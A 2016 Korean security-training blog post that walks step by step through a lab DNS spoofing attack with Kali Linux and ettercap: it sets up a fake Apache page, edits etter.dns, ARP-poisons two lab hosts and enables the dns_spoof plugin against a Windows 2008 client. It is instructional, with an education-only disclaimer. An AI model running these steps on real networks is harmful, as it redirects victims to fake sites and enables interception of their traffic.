정보보안(구버전)/공격툴&정보수집 2016. 5. 25. 15:20
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
- DNS Spoofing : 실제 DNS 서버가 아닌, 공격자 DNS 서버를 통해서 서비스를 받게하는 공격 유형
@ Kali Linux
- Kali Linux는 데미안 계열 리눅스이므로 CentOS와 HTTP 설정 파일 이름이 다르다.
root@kali:~# ls /etc/apache2/
apache2.conf conf-enabled magic mods-enabled sites-available
conf-available envvars mods-available ports.conf sites-enabled
- Fake 웹-페이지를 생성한다.
root@kali:~# cd /var/www/html
root@kali:/var/www/html# ls
index.html
root@kali:/var/www/html#
root@kali:/var/www/html# echo "Fake Web Site" > /var/www/html/index.html
root@kali:/var/www/html#
root@kali:/var/www/html# service apache2 restart
root@kali:/var/www/html# pgrep -lf apache
1963 apache2
1967 apache2
1968 apache2
1969 apache2
1970 apache2
1971 apache2
1972 apache2
root@kali:/var/www/html# service apache2 status
● apache2.service - LSB: Apache2 web server
Loaded: loaded (/etc/init.d/apache2)
Active: active (running) since 수 2016-05-25 16:00:00 KST; 18s ago
Process: 1942 ExecStart=/etc/init.d/apache2 start (code=exited, status=0/SUCCESS)
CGroup: /system.slice/apache2.service
├─1963 /usr/sbin/apache2 -k start
├─1967 /usr/sbin/apache2 -k start
├─1968 /usr/sbin/apache2 -k start
├─1969 /usr/sbin/apache2 -k start
├─1970 /usr/sbin/apache2 -k start
├─1971 /usr/sbin/apache2 -k start
└─1972 /usr/sbin/apache2 -k start
5월 25 16:00:00 kali apache2[1942]: Starting web server: apache2.
root@kali:/var/www/html# firefox http://192.168.20.50
- ettercap DNS 설정 파일 설정
root@kali:/var/www/html# cd /etc/ettercap
root@kali:/etc/ettercap# ls
etter.conf etter.dns etter.mdns etter.nbns
root@kali:/etc/ettercap# vi etter.dns
~ 중간 생략 ~
############################################### www.ettercap.org A 127.0.0.1
###############################################
############################################### alor.org MX 127.0.0.1 ~ 중간 생략 ~
: wq! |
- ettercap 툴 실행
root@kali:~# ettercap -G &
Sniff -> Unified sniffing -> eth1 선택 -> 확인
Hosts -> Scan for hosts
Hosts -> Host list
192.168.20.100 -> Add to Target1 & 192.168.20.201 -> Add to Target2
Mitm -> ARP Poisoning -> 'Sniff remote connections' 체크 -> 확인
Plugins -> Manage the plugins -> dns_spoof 더블 클릭
Start -> start sniffing
@ Window2008
- DNS 캐싱 정보 초기화 실시
C:\Users\Administrator>ipconfig /flushdns
Windows IP 구성
DNS 확인자 캐시를 플러시했습니다.
C:\Users\Administrator>
- 'www.cisco.com' 접속 확인
@ Kali Linux
- ettercap 스니핑 결과 확인
- ettercap 스니핑 중지 (Start -> Stop sniffing) 및 종료 실시
@ Window2008
- DNS 캐싱 정보 초기화 실시
C:\Users\Administrator>ipconfig /flushdns
Windows IP 구성
DNS 확인자 캐시를 플러시했습니다.
C:\Users\Administrator>
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
공격툴&정보수집 - 제11장 DNS Spoofing 공격 https://youtu.be/nQPElqYM71E
'정보보안(구버전) > 공격툴&정보수집' 카테고리의 다른 글
공격툴&정보수집 - 13. HTTPs 패스워드 크래킹 (sslstrip) (0) | 2016.05.26 |
---|---|
공격툴&정보수집 - 12. SNMP Sniffing 공격 (0) | 2016.05.25 |
공격툴&정보수집 - 10. Packet Sniffing 공격 (0) | 2016.05.25 |
공격툴&정보수집 - 09. Brute Force & Dictionary 공격 (0) | 2016.05.25 |
공격툴&정보수집 - 08. 로컬 시스템 부하 공격 (DoS Attack) (0) | 2016.05.25 |